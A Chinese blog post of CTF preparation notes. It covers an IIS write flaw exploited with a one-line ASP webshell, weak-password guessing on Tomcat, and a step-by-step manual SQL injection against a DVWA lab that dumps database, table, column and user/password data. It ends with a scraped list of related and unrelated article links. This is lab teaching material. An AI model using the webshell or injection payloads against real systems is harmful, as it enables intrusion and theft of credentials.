[攻防实战]CTF大赛准备(手动注入sql)
一、IIS write漏洞利用
先用工具扫描,再上传小马,使用菜刀连接即可。
思考点:
如何获知是一台IIS站点?
本例中上传的一句话木马是什么意思?
<%eval request("MH")%>
https://www.cnblogs.com/tdcqma/p/6125789.html
二、Tomcat服务器漏洞利用
先用nmap扫描端口开放信息。
然后利用metasploit或者Apache tomcat.exe工具里面的扫描办法来扫描弱口令。
需要注意的是,对于管理员账号的猜测,可以猜测admin、root、administrator等。
三、SQL 手工注入(以dvwa为例)(参考https://m.jb51.net/show/93442)
1、判断字段总数:
admin,password登录dvwa后,将安全级别调至低。进入sql injection界面。
http://192.168.8.133/dvwa/vulnerabilities/sqli/
输入1’ 报错。确认有注入漏洞。
输入1' order by 2#正常返回结果。输入1' order by 3# 报错。表明数据库只有两列。order by 后面跟的应该是第几列的列数。这样看来数据库表只有两列。结尾的#号用于截断sql语句,以免报错。也可以换做-- -
2、判断显示位
1' union select 1,2# 可以看到1,2分别显示在first name和sur name处。
3、显当前示数据库和版本信息。
1' union select database(),version()#
4、显示所有数据库的名称
1' union select SCHEMA_name,1 from information_schema.schemata#
5、显示当前数据库表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
可以看到当前数据库表名:guestbook,users
6、查询列名:
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
7、查询数据值
1' union select group_concat(user,password),3 from users#
其中user和password是上一步得出的结果。
也可以写作
1' union select user,password from users#
四、PHP
1、strcmp漏洞
https://blog.csdn.net/cherrie007/article/details/77473817
九、在线工具收集
1、http post工具:
http://www.atool.org/httptest.php
2、解码加密工具:
3、PHP及其他语言在线调试工具:
https://c.runoob.com/compile/1
十、CTF大赛本身学习
3、强网杯
4、XCTF(南京赛宁)
[攻防实战]CTF大赛准备(手动注入sql)的更多相关文章
- 【攻防实战】SQL注入演练!
这篇文章目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己. 1.0 介绍 当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并 ...
- dvwa——sql手动注入和sqlmap自动注入
手动注入 low: 源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; ...
- 20169214 2016-2017-2 《网络攻防实践》第十一周实验 SQL注入
20169214 2016-2017-2 <网络攻防实践>SQL注入实验 SQL注入技术是利用web应用程序和数据库服务器之间的接口来篡改网站内容的攻击技术.通过把SQL命令插入到Web表 ...
- WAF攻防实战
摘要 本文主要分为四个部分,一.首先对WAF做了简单的介绍,让读者对WAF这类产品有一个大概的了解:二.这部分通过一个实例演示了如何利用WAF为其后端的Web应用提供安全防护功能:三.安全是相对的,世 ...
- CTF大赛模拟-CFS三层内网漫游
CTF大赛模拟-CFS三层内网漫游 环境: 三台虚拟机,三个网络. target 1:192.168.161.178 ,192.168.52.132 (linux) target 2:192.168. ...
- PHP手动注入实验
课程编写 类别 内容 实验课题名称 PHP手动注入实验 实验目的与要求 1.通过手动注入PHP页面,获取password字段名. 2.了解PHP手动注入的基本原理. 3.了解PHP手动注入的过程和基本 ...
- 20145335郝昊《网络攻防》Bof逆向基础——ShellCode注入与执行
20145335郝昊<网络攻防>Bof逆向基础--ShellCode注入与执行 实验原理 关于ShellCode:ShellCode是一段代码,作为数据发送给受攻击服务器,是溢出程序和蠕虫 ...
- SQL注入(SQL Injection)案例和防御方案
sql注入(SQL Injection):就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. SQL注入攻击的主要危害包括:非法读取.篡 ...
- 【半小时大话.net依赖注入】(一)理论基础+实战控制台程序实现AutoFac注入
系列目录 第一章|理论基础+实战控制台程序实现AutoFac注入 第二章|AutoFac的常见使用套路 第三章|实战Asp.Net Framework Web程序实现AutoFac注入 第四章|实战A ...
随机推荐
- BNUOJ 1207 滑雪
滑雪 Time Limit: 1000ms Memory Limit: 65536KB This problem will be judged on PKU. Original ID: 10886 ...
- CentOS下SWAP分区建立及释放内存详解
方法一: 一.查看系统当前的分区情况: >free -m 二.创建用于交换分区的文件: >dd if=/dev/zero of=/whatever/swap bs=block_size ( ...
- 使用HttpClient实现对第三方服务器的请求并接受返回数据
/* * 创建日期 2017-4-7 * * TODO 要更改此生成的文件的模板,请转至 * 窗口 - 首选项 - Java - 代码样式 - 代码模板 */ package com.enfo.int ...
- cf299C Weird Game
Weird Game Yaroslav, Andrey and Roman can play cubes for hours and hours. But the game is for three, ...
- [MFC] CString小用例
在实际项目中需要对数字转成的字符串进行格式处理, 如: 50.500000,需要转化成50.5; 1.00000,需要转化成1, 对于编号而言要求都是4位,不足前面补0. 如1转成0001,222转成 ...
- BestCoder Round #29 1003 (hdu 5172) GTY's gay friends [线段树 判不同 预处理 好题]
传送门 GTY's gay friends Time Limit: 6000/3000 MS (Java/Others) Memory Limit: 65536/65536 K (Java/Ot ...
- Xcode6 pch文件
XCode6里, 默认是没有pch文件的,如果我们想使用pch文件,需要手动添加,添加步骤如下 1.在XCode6中是么有pch文件的,如下图 2.创建pch文件 3.配置pch文件 ...
- nginx配置 location root alias
语法规则: location [=|~|~*|^~] /uri/ { … } = 开头表示精确匹配 ^~ 开头表示uri以某个常规字符串开头,理解为匹配 url路径即可.nginx不对url做编码,因 ...
- 533. Lonely Pixel II
Given a picture consisting of black and white pixels, and a positive integer N, find the number of b ...
- Golang 入门 : 等待 goroutine 完成任务
Goroutine 是 Golang 中非常有用的功能,但是在使用中我们经常碰到下面的场景:如果希望等待当前的 goroutine 执行完成,然后再接着往下执行,该怎么办?本文尝试介绍这类问题的解决方 ...